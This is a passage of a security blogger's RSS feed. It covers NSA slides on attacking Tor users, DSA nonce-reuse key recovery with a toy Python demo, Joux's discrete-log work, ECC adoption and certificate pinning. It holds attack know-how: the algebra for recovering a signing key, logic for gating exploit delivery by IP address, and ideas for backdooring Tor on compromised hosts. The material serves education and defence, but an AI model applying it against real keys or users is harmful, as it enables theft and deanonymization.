<p>Apparently they tested their callback mechanism (the piece of code that will phone home to their server) and while it worked on normal Firefox, it didn't work on Tor Browser Bundle. It "gained execution" but "didn't receive FINKDIFFERENT", and that it was "defeated by prefilter hash".</p>

<p>When running a clientside exploitation test for a client, we'll limit our exploits from being served to random people outside their corporate network, usually using IP address filtering.  If you're not in the netblock we expect - you don't get the exploit. For us, this is to avoid hacking anyone who hasn't asked for it - for the NSA it's (probably) to limit the chance of detection, and (hopefully) for legal reasons.</p>
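<p>Such a prefilter is tiny to implement - something like the following, using only the standard library (the netblocks are placeholders):</p>

```python
# Sketch: IP-based exploit prefilter - serve the payload only to addresses
# inside the expected netblock(s).
import ipaddress

def allowed(client_ip, target_netblocks):
    """Return True if client_ip falls inside any approved netblock."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip in ipaddress.ip_network(block) for block in target_netblocks)
```

<p>And this is exactly the check Tor would break: the server never sees the target's real address, only the exit node's, so the prefilter refuses to fire even though the exploit "gained execution".</p>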

<p>If their generic exploitation engine (which Schneier says is called FOXACID[4]) was built in a similar way, they would load the target's IP address into it, and have a mechanism that blocks exploitation unless the payload was accessed by that IP address.  Tor would break that - there's the target IP address (which they may read from the machine), and there's the exit node's IP address which is likely read by the server sending the exploit.</p>

<p>I don't know what EGGI or FIDI are, but that's my interpretation of this slide.</p>


<h4>Further Clientside Exploitation</h4>

<p>There is also a section on dirty tricks that can be played if you've gained access to the user's machine. [0 slide 17] mentions "given CNE access to a target computer" - I interpret that to mean "given Computer Network Exploitation access" - that is, "if we're controlling their box already, but we don't want to do something that may alert the user (like copying all their traffic to our IP), how can we subtly backdoor them".  This is pretty far outside Tor's threat model - if an attacker is running an application as the same user or as root/Administrator, there's not much a desktop operating system does to prevent one application (like a rootkit) from manipulating a second application (like Tor).  But it's definitely worth examining their ideas:</p>

<ol>
<li>Alter path selection to use exit nodes they control or monitor closely - this could be done by modifying or replacing the Tor binaries on disk, or while it is running in memory 
<li>Slide them onto an entire other Tor network - also possible to do on disk or in memory, all you'd need to do would be replace the hardcoded directory servers and signing keys
<li>Stain their user agent or traffic so they can identify it on the way out (as mentioned above, they say they can do this already)
<li>Have the computer call out and let them know where it is (which is <a href="https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690">what the FBI</a> <a href="http://oweng.myweb.port.ac.uk/fbi-tor-malware-analysis/">did in the Freedom Hosting situation</a>)
</ol>

<h4>Web Server Exploitation</h4>

<p>Again, given a presence on the webserver (they control or have exploited it), they talk about sending the traffic out of the webserver in such a way that the Tor traffic going to the client is distinguishable. ([0 slide 18] and the Timing De-Anonymization section above)</p>

<h4>Mass Node Exploitation</h4>

<p>The fairly popular theory of "I bet the NSA has just exploited all the Tor nodes" seems to be partially debunked in [0 slide 19]. They explain "Probably not. Legal and technical challenges."</p>

<h4>Tor Disruption</h4>

<p>A popular topic in the slides is disrupting and denying access to Tor. My theory is that if they can make Tor suck for their targets, their targets are likely to give up on using Tor and use a mechanism that's easier to surveil and exploit.  [0 slide 20] talks about degrading access to a web server they control if it's accessed through Tor. It also mentions controlling an entire network and denying, degrading, or disrupting the Tor experience on it.</p>

<p>Wide scale network disruption is put forward on [0 slide 22]. One specific technique they mention is advertising high bandwidth but actually performing very slowly.  This is a similar trick to one used by [Weinmann13], so the Tor Project is both monitoring for wide scale disruption of this type and combatting it through design considerations.</p>

<h3>Conclusion</h3>

<p>The concluding slide of [0] mentions "Tor Stinks... But It Could be Worse". A "Critical mass of targets do use Tor. Scaring them away from Tor might be counterproductive".</p>

<p>Tor is technology, and can be used for good or bad - just like everything else. Helping people commit crimes is something no one wants to do, but everyone does - whether it's by just unknowingly giving a fugitive directions or selling someone a gun they use to commit a crime. Tor is a powerful force for good in the world - it helps drive change in repressive regimes, helps law enforcement (<a href="https://blog.torproject.org/blog/trip-report-tor-trainings-dutch-and-belgian-police">no, really</a>), and helps <a href="https://www.torproject.org/about/torusers.html.en">scores of people</a> protect themselves online. It's kind of naive and selfish, but I hope the bad guys are scared away, while we make Tor more secure for everyone else.</p>

<p>Something that's worth noting is that this is a lot of analysis and speculation off some slide decks that have uncertain provenance (I don't think they're lying, but they may not tell the whole truth), uncertain dates of authorship, and may be omitting more sensitively classified information. This is a definite peek at a playbook - but it's not necessarily the whole playbook. We should keep that in mind and not base all of our actions off these particular slide decks. But it's a good place to start and a good opportunity to reevaluate our progress.</p>

<pre>[0] <a href="http://media.encrypted.cc/files/nsa/tor-stinks.pdf">http://media.encrypted.cc/files/nsa/tor-stinks.pdf</a>
[1] <a href="http://media.encrypted.cc/files/nsa/egotisticalgiraffe-wapo.pdf">http://media.encrypted.cc/files/nsa/egotisticalgiraffe-wapo.pdf</a>
[1.5] <a href="http://media.encrypted.cc/files/nsa/egotisticalgiraffe-guardian.pdf">http://media.encrypted.cc/files/nsa/egotisticalgiraffe-guardian.pdf</a>
[2] <a href="http://media.encrypted.cc/files/nsa/advanced-os-multi-hop.pdf">http://media.encrypted.cc/files/nsa/advanced-os-multi-hop.pdf</a>
[3] <a href="http://media.encrypted.cc/files/nsa/mullenize-28redacted-29.pdf">http://media.encrypted.cc/files/nsa/mullenize-28redacted-29.pdf</a>
[4] <a href="http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity">http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity</a>
[Weinmann13] <a href="http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf">http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf</a></pre>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptopocalypse_followup.html</guid>
		<title>About the Cryptopocalypse</title>
		<pubDate>20 Aug 2013 9:11 EST</pubDate>
		<description><![CDATA[
<h3>Randomness, and DSA</h3>

<p>Last weekend, Bitcoin <a href="http://bitcoin.org/en/alert/2013-08-11-android">reported that several Android-based wallets were insecure</a> and that bitcoin were stolen from them - all because the individual transactions (authenticated by a ECDSA signature) used a poor source of randomness.  When you use a poor source of randomness in a DSA (or ECDSA) signature, you may reuse one of the values in the signature, the <em>k</em> value.  Reusing <em>k</em> can expose the private key - something <a href="http://www.exophase.com/20540/hackers-describe-ps3-security-as-epic-fail-gain-unrestricted-access/">Sony knows well</a>, as it was the flaw that exposed a private key in the PS3. </p>
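<p>The algebra behind that recovery is worth seeing once. With two signatures (r, s1) and (r, s2) over message hashes h1 and h2 that share the nonce k, we have k = (h1 - h2)/(s1 - s2) mod q, and then x = (s1*k - h1)/r mod q. A toy worked example (tiny made-up numbers, not a real DSA group - the point is only the algebra):</p>

```python
# Toy demonstration of why nonce reuse is fatal in (EC)DSA.
# Parameters are illustrative stand-ins, not a real group.

q = 2147483647          # a small prime standing in for the subgroup order
x = 123456789           # the "private key" we will recover
k = 987654321           # the nonce, wrongly reused for both signatures
r = 55555               # in real DSA r = (g^k mod p) mod q; fixed here by fixed k

def sign(h):
    # s = k^-1 * (h + x*r) mod q
    return (pow(k, -1, q) * (h + x * r)) % q

h1, h2 = 1111, 2222
s1, s2 = sign(h1), sign(h2)

# Attacker's side: recover k, then x, from public values only.
k_rec = ((h1 - h2) * pow(s1 - s2, -1, q)) % q
x_rec = ((s1 * k_rec - h1) * pow(r, -1, q)) % q
assert (k_rec, x_rec) == (k, x)
```

<p>Two signatures, a subtraction, and two modular inverses - that's the entire attack, which is why a bad RNG turns directly into stolen long-term keys.</p>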

<p>But the Bitcoin apps used SecureRandom, which as the name implies is actually supposed to be cryptographically secure.  On Android, it's the recommended, "cryptographically secure" library... and it wasn't secure.  And the results have been as catastrophic as they can be - long term private keys have been recovered.  <em>Why?</em>  Mathematically speaking, we understand why - but why do we rely on DSA, when it has this horrendous property?  We know that random number generators will fail.  Whether it's this instance, <a href="https://factorable.net/">Mining Your P's and Q's</a>, or <a href="https://wiki.debian.org/SSLkeys">Debian's openssl bug</a> - even in seemingly highly secure or reliable instances... we still shouldn't trust the random number generator fully.  While every algorithm requires strong randomness for key generation, only DSA requires strong randomness for every signature - RSA does not.  <strong>It's time to stop letting DSA hold a gun to our heads.</strong></p>

<p>Fortunately, we have a solution, and it doesn't necessarily require moving to another algorithm.  We can incrementally fix DSA.  The <em>k</em> value doesn't necessarily have to be random - it just must be unique and secret.  <a href="https://tools.ietf.org/html/rfc6979">RFC 6979</a> is a mechanism to generate a unique number based off the key and message, to ensure it's not reused.  Dubbed "deterministic DSA" - you can generate signatures with this technique that are completely compatible with any DSA signature-checking implementation.  With all the problems DSA has given us, deterministic DSA (or another scheme that does not rely on randomness for every single signature) really needs to be the standard way of generating signatures.</p>
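<p>RFC 6979 derives <em>k</em> through an HMAC_DRBG construction; the sketch below captures only the core idea - the nonce is a deterministic, secret function of the key and message, so it never repeats across distinct messages - and is <em>not</em> the actual RFC 6979 algorithm:</p>

```python
# Simplified illustration of a deterministic nonce. This shows the *idea*
# behind RFC 6979 (nonce = keyed function of the message), not its exact
# HMAC_DRBG construction - don't use this in place of the real RFC.
import hashlib
import hmac

def deterministic_k(private_key: bytes, msg_hash: bytes, q: int) -> int:
    digest = hmac.new(private_key, msg_hash, hashlib.sha256).digest()
    return int.from_bytes(digest, "big") % (q - 1) + 1   # force 1 <= k < q
```

<p>Same key and message always yield the same k (so there's nothing for a broken RNG to ruin), while an attacker without the private key can't predict it.</p>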

<p>The option to do this in OpenSSL (EC_KEY_set_nonce_from_hash) has been <a href="http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=8a99cb29d1f0013243a532bccc1dc70ed678eebe">committed</a> (by <a href="https://www.imperialviolet.org/2013/06/15/suddendeathentropy.html">Adam Langley</a>) and will be available in new versions. To be pedantic, another signature scheme that creates a deterministic, unique value is the ECC-based <a href="http://ed25519.cr.yp.to/">ed25519</a> signature scheme; and <s><a href="https://en.wikipedia.org/wiki/Schnorr_signature">Schnorr signatures</a> also reduce the dependence on randomness</s> - <a href="https://twitter.com/trevp__/status/369872271017402368">Schnorr signatures do depend on the RNG</a>.</p>  

<h3>Cryptopocalypse, and Joux's Work</h3>

<p>So let's talk about Cryptopocalypse.  What I anticipated being a relatively low impact talk urging folks to examine how we're betting the farm in one particular area (which is always a bad idea) - has turned into a momentous media surge.  A lot of folks have rightly picked on how we portrayed the applicability of Joux's work to RSA.  I want to follow up with some more details for folks who weren't able to attend, as a lot of the media coverage has been second and third hand accounts.</p>

<p>To start off, in the talk I gave several examples of the relationship between factoring and discrete logs.  It turns out some of the parallels go back even further... to the 1920s and 1930s!  "Th&eacute;ories des nombres" (<a href="http://www.bibliographique.com/livre_kraitchik_theorie_nombres_gauthier_villars-3082">1922</a>) and "On Factoring Large Numbers" (<a href="http://www.ams.org/journals/bull/1931-37-10/S0002-9904-1931-05271-X/">1931</a>) talk about solving Discrete Logs and Factoring respectively, both using the technique of combining congruences.  For other historical notes, and more math, there are some <a href="https://news.ycombinator.com/item?id=6156309">excellent links worth pointing</a> to <a href="https://news.ycombinator.com/item?id=6191171">in the discussions of the talk</a>.</p>

<p>But let's talk more about the <em>recent</em> work.  A lot of focus in the media has been on RSA.  Which is understandable, because of how entrenched we are with RSA.  Let me go back to the math though.  Joux's record-setting Discrete Logs are done in a field of small characteristic that is also highly composite.  A small characteristic is <em>not</em> what Diffie-Hellman, DSA, and ElGamal are done in; they are done in 'large characteristic' fields, or more commonly 'prime fields'. (Also, to be clear, this is 'classic' DH and DSA, as opposed to the Elliptic Curve flavors: ECDH and ECDSA.)</p>

<p>There are roughly four steps of the Function Field Sieve:
<ol>
<li>Polynomial Selection</li>
<li>Sieving</li>
<li>Linear Algebra</li>
<li>the Descent</li>
</ol>
</p>

<p>Polynomial selection is done to find a polynomial that will be used in sieving, and sieving finds relations between the logs of elements in the field.  The Linear Algebra is used to solve these relations to get the logarithms of them.  The output of the Linear Algebra is a set of vectors, where each vector represents the discrete log of an element.  Imagine them as a system of equations.  The Descent starts at the specific element you want to solve for, and recursively uses these systems of equations to rewrite the specific element into smaller and smaller terms that you can eventually solve. (That's why it's called the Descent.)</p>

<p>Joux chooses a specific polynomial - this is roughly analogous to the polynomial selection for factoring special numbers (using the Special Number Field Sieve).  Based on the structure of the individual target, you choose a polynomial that fits well.  The sieving is sped up due to the small characteristic and also because the field being worked on is highly composite.  These are optimizations that don't apply directly to prime fields.</p>

<p>Before 2013, in what some people are calling the 'classic Function Field Sieve' (which is an interesting hint about how much things have changed) - the Descent was actually pretty fast.  Way less than 1% of the run time of an entire Function Field Sieve process.  But now, with the new techniques, the Descent is much harder.  The sieving is very fast, and you complete the linear algebra quickly - but there are far fewer relations than there were before.  It's much harder to descend to them.  Before, people didn't care about optimizing the Descent - now it's very important.</p>

<p>And the Descent has been optimized for fields of a small characteristic.  It's been optimized to the point of quasi-polynomial time, a fantastic achievement. In fact, as the characteristic gets larger (up to "medium" characteristic), the algorithm still applies - it just gets progressively slower as the characteristic grows.</p>

<p>Does the new Descent algorithm apply to prime fields though?  Not right now.  And the reason why is very interesting.  During the Descent, the major tool used is detecting smooth elements.  (A <a href="https://en.wikipedia.org/wiki/Smooth_number">smooth element</a> is one that has small prime factors.)  For fields of a small characteristic, this is fast and efficient, because the elements can be represented by polynomials, and detecting the smoothness of a polynomial is easy.  For prime fields, the elements seemingly cannot be represented that way.  In that case, detecting the smoothness of an element is done by... <em>factoring it</em>.  </p>
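<p>For intuition, here's the naive version of that smoothness test over the integers - trial division up to the bound. (This is the brute-force stand-in; for prime fields the serious tool is ECM, as discussed below.)</p>

```python
# Sketch: testing B-smoothness by trial division. A number is B-smooth if
# every prime factor is <= B. Dividing by composites in the loop is harmless
# because their prime factors have already been stripped out.

def is_smooth(n, bound):
    """Return True if every prime factor of n is <= bound."""
    if n < 1:
        return False
    for p in range(2, bound + 1):
        while n % p == 0:
            n //= p
    return n == 1
```

<p>The asymmetry in the text is now concrete: for polynomials over a small-characteristic field the analogous check is cheap, while here the honest answer for a large integer requires factoring it.</p>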

<p>A major limitation of solving discrete logs in prime fields today, is the lack of an efficient factoring algorithm!  Now, for prime fields, <a href="http://mathworld.wolfram.com/EllipticCurveFactorizationMethod.html">ECM</a> is used. (EC stands for 'Elliptic Curve', in yet another all-math-is-related-but-don't-get-confused-because-we-haven't-changed-topics situation. We haven't started talking about Elliptic Curves or anything.)  ECM is used because it turns out to be more efficient than the General Number Field Sieve (GNFS) when a number has small factors.  (For breaking RSA keys, we use the GNFS.) ECM is being improved, and there are several papers published on the topic each year.</p>

<p>But to circle back home, I wanted to explain Joux's work a level deeper (but still quite a bit above the actual published papers).  The recent work has gotten mathematicians very excited about discrete logs, and in essence, Joux's work is very analogous to the <em>Special Number Field Sieve</em>, which is used to factor large numbers that have very specific properties.</p>

<p>The work does not have obvious implications for prime fields (which is what DH, DSA, and ElGamal use) and it does not have obvious implications for RSA (from no less than <a href="https://twitter.com/pbarreto/status/368055071054888960">the man himself</a>).  But all of these problems are somewhat related, and improvements in one area can lead to improvements in another - either from indirect applications of the research, or from focused scrutiny and excitement.  Advances in the General Number Field Sieve <a href="http://www.ams.org/notices/199612/pomerance.pdf">have evolved</a> out of the Special Number Field Sieve.</p>

<p>We need <em>much more flexibility</em> in our cryptographic protocols.  When advances are made, we are bitten by them - again, and again, and again.  MD5 was known to be weak in the mid-2000s - but it took generating a rogue certificate authority to convince browsers and CAs they needed to deprecate it right away.  (And it still took them a few years.)  And even after that - Stuxnet still exploited an MD5-based vulnerability.  Single-DES was known to be brute-forcible in <em>1999</em>, and yet we're still breaking deployed protocols relying on it today: MSCHAPv2 in 2012, SIM Cards and PEAP network authentication in 2013.  RSA-1024 is known to be weak today (estimates I've seen have suggested it's doable with 3-11 TB RAM clusters, which isn't terribly large).  And while (some) browsers <a href="https://cabforum.org/pipermail/public/2013-August/002105.html">seem to plan on distrusting 1024-bit root certs in early 2014</a> - we're going to be trusting 1024-bit certs for much longer than we should be.  (Oh, and Apache has no option to increase the DH bit-length above 1024, so your "Perfect Forward Secrecy" DHE sessions aren't looking too good.)</p>

<p><strong>If you aren't planning for the Cryptopocalypse of whatever algorithm and keysize you're trusting right now - you're doomed to repeat the same mistakes.</strong> Because we keep falling victim to known-broken algorithms again, and again, and again.</p>

<h3>ECC & TLS</h3>

<p>In our slides, we mentioned that TLS 1.2 was the first to include ECC options.  Some ciphersuites will not work in prior versions of TLS (like GCM-based ciphersuites) but others will.  Adam Langley pointed out you can use ECDH, ECDHE, and ECDSA in TLS 1.0, so long as your browser supports it (and nearly all up to date browsers do).  Also, a small correction - you are able to have the CA and Certificate signing algorithm not match prior to TLS 1.2 - cross-signing is possible in TLS 1.0.</p>

<p>Something I'd like to be called out on, that we haven't been yet, is being able to easily buy an ECC-based SSL cert from a Certificate Authority.  <strong>It sure would be nice to be able to buy an ECC certificate for my website.</strong>  Now I've had one or two people ask me - if you don't trust RSA, what's the point of getting an ECC cert when the whole internet trusts tons of RSA-based CAs?</p>

<p>And the answer is Certificate Pinning. You can use <a href="https://www.imperialviolet.org/2011/05/04/pinning.html">Chrome's preloaded pins</a>, the almost-completed <a href="https://datatracker.ietf.org/doc/draft-ietf-websec-key-pinning/">Public Key Pinning header</a>, the forthcoming <a href="http://tack.io/">TACK</a> extension, and <a href="https://github.com/iSECPartners/ssl-conservatory">iOS</a> and <a href="https://github.com/moxie0/AndroidPinning">Android</a> solutions to pin to your ECC cert, and not have to worry about RSA <em>or</em> compromised certificate authorities.</p>
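<p>The check at the heart of all those pinning mechanisms is small: hash the server's public key info and compare it against a baked-in set of pins. A minimal sketch (the DER bytes below are stand-ins, not a real key; real pinning also needs backup pins and careful failure handling):</p>

```python
# Sketch: the core of a public-key pin check - base64(SHA-256(SPKI DER))
# compared against a preloaded set of acceptable pins.
import base64
import hashlib

def spki_pin(spki_der: bytes) -> str:
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()

def pin_matches(spki_der: bytes, pinned: set) -> bool:
    return spki_pin(spki_der) in pinned
```

<p>Because the pin is on <em>your</em> key, a compromised CA issuing a rogue RSA cert for your domain fails this check even though it chains to a trusted root.</p>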

<h3>ECC is Nice</h3>

<p>At the end of our talk we lay out a lot of recommendations for people.</p>

<ul>
<li>If you work on an OS or a language - make ECC easy to use, and use it yourself
<li>If you work on a browser - keep pushing TLS 1.2.  (All browsers are working on this, to be fair)
<li>If you write software - support TLS 1.2 on your webservers, make your protocols upgradable (or use TLS 1.2), and don't place all your trust for software updates in any single thing like RSA
<li>If you're a CA - make it easy to buy ECC certs, and document the process
<li>If you're a normal company - turn on ECDHE, survey your exposure
</ul>

<p>Making ECC built-in, accessible, and relied-on makes sense.  The Prime Field curves have strong security margins, shorter ciphertext (awesome for cellular and mobile), and efficiency gains.  We're having major difficulties moving off RSA-1024, and that shouldn't be trusted <em>today</em>.  <strong>Starting to support ECC today will make it so much less painful to migrate to it when we need to.</strong> It's much, much easier for clients (especially browsers) to disable support for a newly vulnerable feature than it is to deploy a brand-new feature entirely.</p>

<p>As an important footnote, <a href="http://www.daemonology.net/blog/2013-08-10-the-factoring-cryptopocalypse.html">Colin Percival</a>  and <a href="http://www.linkedin.com/groups/CRYPTO-GAINS-RAMP-UP-CALLS-3901854.S.262868971">Dennis F</a> pointed out that binary curves give most people pause. And the reasoning is excellent - Binary Curves have an 'inherent structure', and we seem to be pretty good at exploiting inherent structures.  So staying on the P curves is prudent.</p>

<h3>Do we have anything else?</h3>

<p>Now I just talked about needing flexibility, and then said ECC a bunch of times.  Betting the farm on ECC isn't flexibility.  Flexibility comes from RSA + ECC, ideally in tandem, but if not, being able to switch between them easily. But what about things besides ECC?</p>

<p>As <a href="http://blog.cryptographyengineering.com/2013/08/is-cryptopocalypse-nigh.html">Matt Green points out</a>, there's the McEliece Cryptosystem, which "only" has 187-kilobit to 1-megabit keys. (That's sarcasm.) And there's <a href="http://en.wikipedia.org/wiki/NTRU">NTRU</a>, which looks pretty awesome.  It's efficient, well studied, and even standardized.  It is, however, patented.  There's some <a href="https://github.com/tbuktu/ntru/issues/1">flexibility there</a>, and the patent may be <a href="http://blog.cryptographyengineering.com/2013/08/is-cryptopocalypse-nigh.html?showComment=1376949224351#c7418758352784224768">expiring soon</a>, but just as <a href="http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html">OCB mode never caught on</a> (probably due to the patent), NTRU isn't catching on either. A shame, in my opinion, as NTRU neatly avoids the 'Quantum Cryptopocalypse' also.</p>

<p>I would be remiss if I did not thank Jason Papadopoulos and Pierrick Gaudry for all their work helping me understand this stuff.  Any errors are entirely mine and not theirs.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-deanonymizing_amm_followup1.html</guid>
		<title>De-Anonymizing Alt.Anonymous.Messages Followup 1</title>
		<pubDate>12 Aug 2013 19:00:00 EDT</pubDate>
		<description><![CDATA[
<p>I've been overwhelmed by the positive response to <a href="/blog-deanonymizing_amm.html">De-Anonymizing Alt.Anonymous.Messages</a> on twitter, mailing lists, reddit, and all around.  I recognize it's pretty niche (in comparison to the Femtocell talk, the room in AAM slowly dwindled, as opposed to slowly filling up over time) - but I'm glad people enjoyed it, and I'm extremely happy that publishing the transcript/speaker notes has let so many more people read it.  I also want to thank Zax, again.  I had some ideas about how nymservs and Type I remailers worked, and I was pretty far off.  Fortunately, I engaged Zax a few months out from my talk, and he was able to right most of my views - without his help I would have been in sad shape.</p>

<p>I wanted to follow up on a few comments I saw.  I got a message via the <a href="http://hoi-polloi.org/policies.html">hoi-polloi.org mixmaster node</a> that pointed me to <a href="http://wjlanders.users.sourceforge.net/">another suite of software</a> I did not include in my slides. Most of these programs have been updated in the past few months - so they are actively maintained.</p>

<p>The suite includes:
<ul>
<li>An <a href="http://wjlanders.users.sourceforge.net/mailcheck.html">AAM checker</a> for monitoring AAM and checking whether you have new messages (hardcoded subjects or hsubs only; no esubs, it appears).</li>
<li>An <a href="http://hsubinterpreter.sourceforge.net/">email-substitute</a> for communicating with a specific person or persons via nyms and AAM, including automatically setting up your nym</li>
<li>A program that seems to combine the previous two programs into a generic <a href="http://aamdirect.sourceforge.net/">AAM reader and poster</a></li>
<li>A <a href="http://genmixdummy.sourceforge.net/">cover traffic</a> tool to send dummy Mixmaster messages and dummy AAM messages from your connection, so someone watching ideally isn't quite sure which messages you send are legit and which are not.</li> 
</ul>
</p>

<p>I haven't actually examined any of the code (although it seems to be open source on sourceforge) - but maybe this is a nice architecture to explore more: use shared libraries to provide the functionality, and put simpler and more complicated GUIs on top for less and more technical users. (Not that I'd call the 'simple' GUIs that simple, I'm just talking in the abstract.)</p>

<p>For a listing of other AAM tools, check the Bonus Slides at the end of <a href="/p/AAM-defcon13.pdf">the original AAM slides (with speaker notes)</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-deanonymizing_amm.html</guid>
		<title>De-Anonymizing Alt.Anonymous.Messages</title>
		<pubDate>3 Aug 2013 16:00:00 PDT</pubDate>
		<description><![CDATA[
<p>For the past four years I've been working on a project to analyze <a href="https://groups.google.com/forum/#!forum/alt.anonymous.messages">Alt.Anonymous.Messages</a>, and it was finally getting to a point where I thought I should show my work.  I just finished presenting it at <a href="http://defcon.org/html/defcon-21/dc-21-speakers.html#Ritter">Defcon</a>, and because a lot of the people I know are interested in this were not able to make it, <a href="/p/AAM-defcon13.pdf" class="themainlink">I'm making the slides, and more importantly the speaker notes, available for download</a>.  This kind of kills the chance anyone will actually watch the video, but that's all right.</p>

<p>The slides cover the information-theoretic differences between SSL, Onion Routing, Mix Networks, and Shared Mailboxes.  They talk about the size of the dataset I analyzed, and some broad percentages of the types of messages in it (PGP vs Non-PGP, Remailed vs Non-Remailed).  Then I go into a large analysis of the types of PGP-encrypted messages there are: messages encrypted to public keys, to passwords and passphrases, and PGP messages not encrypted at all!  </p>

<p>For messages encrypted to a public key, I can draw communication graphs, and there are some interesting ones - some very symmetrical graphs where everyone talks to everyone else, and some less structured ones that may model a larger community where not everyone knows everyone else.  I also perform brute force attacks against password-encrypted messages, using GPU-powered crackers I had to develop myself.  The cracked messages usually turn out to also be encrypted to public keys, and to be sent from a Type I nymserv.  </p>

<p>On the statistical-analysis side of things, I correlate subjects that are in plaintext and hexadecimal (including cracking hsubs using more custom GPU code).  I also look at message headers, including several unique ones added on the client (such as distinguishing Newsgroups headers, and misspellings of X-No-Archive).  Several Type I remailer directives made their way into AAM, even though they shouldn't have - Type I remailers are pretty difficult to use.  And there are some very interesting message patterns, such as redundant messages and odd response patterns.  </p>

<p>Summing up, I talk about Nymservs (and Pynchon Gate), the current status of the Mixmaster and Mixminion networks and software (and the path forward for Mixminion), and finally wax poetic about the need for a high-bandwidth, high-latency... something to securely leak and share large files.</p>

<p>For more on this and related topics like remailers, I slowly write about them over at <a href="https://crypto.is/blog/">crypto.is</a> (and copy the blog posts here), and on IRC in <a href="https://crypto.is/about/">OFTC #cryptodotis</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-femtocell1.html</guid>
		<title>Femtocell Media Blitz, and Vegas 2013</title>
		<pubDate>15 Jul 2013 08:26:00 EST</pubDate>
		<description><![CDATA[
<p>Hi all.  If you wound up here as a result of the <a href="http://www.reuters.com/article/2013/07/15/us-verizon-hacking-idUSBRE96E06X20130715">many</a> <a href="http://money.cnn.com/video/technology/2013/07/15/t-hack-phone-calls-texts-and-browsing.cnnmoney/index.html?iid=HP_LN">news</a> <a href="http://www.npr.org/blogs/alltechconsidered/2013/07/15/201490397/How-Hackers-Tapped-Into-My-Verizon-Cellphone-For-250">articles</a> about the Verizon femtocell - thanks.  This is my personal site, and while I try to keep it pretty tech relevant, it goes into more cryptography and anonymity theory than my <a href="https://isecpartners.com/">company's website</a>.  Obviously, the opinions I express here and on twitter are not my employer's.</p>

<p>If you'd like to learn more about how we broke into <a href="">Verizon's Network Extender</a> and can use it to listen to your phone calls, read your SMS and MMS, and man-in-the-middle your data connection - <a href="https://twitter.com/dugdep">Doug</a> and I will be presenting the work at <a href="https://www.blackhat.com/us-13/briefings.html#Ritter">Black Hat</a> and <a href="http://defcon.org/html/defcon-21/dc-21-speakers.html#DePerry">Defcon</a> later this month!  (With the help of Andrew Rahimi who has helped us on this project immensely.)</p>

<p>Besides the Femtocell talk (which believe me, is plenty), I'm also presenting twice more in Vegas.  At Black Hat, <a href="https://blackhat.com/us-13/briefings.html#Stamos">The Factoring Dead: Preparing for the Cryptopocalypse</a> is a talk I'm helping out on, just a smidge, with Alex Stamos, Tom Ptacek, and Javed Samuel.  There have been a lot of recent advances from Joux in solving discrete logarithms in fields of small characteristic.  What if this made the jump to RSA and factoring?  How screwed would we be?  And at Defcon, a talk I've been working on for literally years: <a href="http://defcon.org/html/defcon-21/dc-21-speakers.html#Ritter">De-Anonymizing Alt.Anonymous.Messages</a>.  Have you ever <a href="https://groups.google.com/forum/#!forum/alt.anonymous.messages">looked at it</a>?  It's a giant shared inbox of encrypted messages.  Have someone dump messages to you there, and nobody knows if you received a message or not.  Well, at least in theory.  I've collected hundreds of thousands of posts and have been working on analyzing, brute forcing, and correlating messages based on... metadata.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-dendritic_arborization.html</guid>
		<title>Dendritic arborization in dauer IL2 neurons</title>
		<pubDate>24 Jun 2013 20:05:34 EST</pubDate>
		<description><![CDATA[
<p>This week is the 19th Annual International <i>C. Elegans</i> Meeting, where the poster <a href="http://abstracts.genetics-gsa.org/cgi-bin/celegans13s/wsrch13.pl?author=androwski&sort=ptimes&sbutton=Detail&absno=13510473&sid=198110"><i>Dendritic arborization in dauer IL2 neurons: Genetic and bioinformatic analyses</i></a> is being presented, which I am a contributing author on.  This work shows the changes that IL2 neurons undergo as a result of the stress-induced dauer lifecycle stage.  For more information, you can attend the meeting and register <a href="http://www.celegans.org/2013/pages/registration.shtml">on-site</a> where the poster will be presented this Saturday June 29th, between 3:30 and 5PM PST.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-amazon_windows_passwords.html</guid>
		<title>Decrypting Amazon EC2 Windows Passwords</title>
		<pubDate>3 Mar 2013 18:43:34 EST</pubDate>
		<description><![CDATA[
<p>If you spin up a Windows Instance on Amazon EC2, the only way to get its password is to use an Amazon-provided command-line tool to decrypt it (supplying your private SSH key), or to paste your private SSH key into the Web Interface.  That didn't sit too well with me. I'd prefer Amazon not have my private SSH key.</p>

<p>I dug into the web interface, and their 3MB of obfuscated javascript, and found that they do the decryption locally in Javascript - as they should.  I feel a little better now, but just the same I'd rather not trust them not to go and steal the key, or change it to a server-side operation for "performance reasons" or something.</p>

<p>The password is padded with PKCS#1 1.5, encrypted, and then put through some odd byte/hex transformations.  If you'd like to decrypt the password yourself, locally, I've put up a <a href="https://github.com/tomrittervg/decrypt-windows-ec2-passwd" class="themainlink">script on github</a> to do so. It doesn't handle every corner case (encrypted keys being the biggest) but hopefully it helps you a little.</p>
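<p>If you're curious what the padding layer looks like, here's a minimal stdlib-only Python sketch of PKCS#1 v1.5 (type 2) padding - just the generic padding format, not Amazon's byte/hex transformations, the RSA step, or the code in the linked script.</p>

```python
import os

def pkcs1_v15_pad(message: bytes, key_bytes: int) -> bytes:
    """PKCS#1 v1.5 (type 2) padding: 0x00 0x02 <nonzero random> 0x00 <message>."""
    if len(message) > key_bytes - 11:
        raise ValueError("message too long for key size")
    pad_len = key_bytes - 3 - len(message)
    # The filler bytes must be nonzero, so the 0x00 separator is unambiguous.
    filler = bytes(b % 255 + 1 for b in os.urandom(pad_len))
    return b"\x00\x02" + filler + b"\x00" + message

def pkcs1_v15_unpad(block: bytes) -> bytes:
    """Strip the padding from a decrypted block, checking its structure."""
    if block[0:2] != b"\x00\x02":
        raise ValueError("bad padding header")
    sep = block.index(b"\x00", 2)  # first zero byte after the random filler
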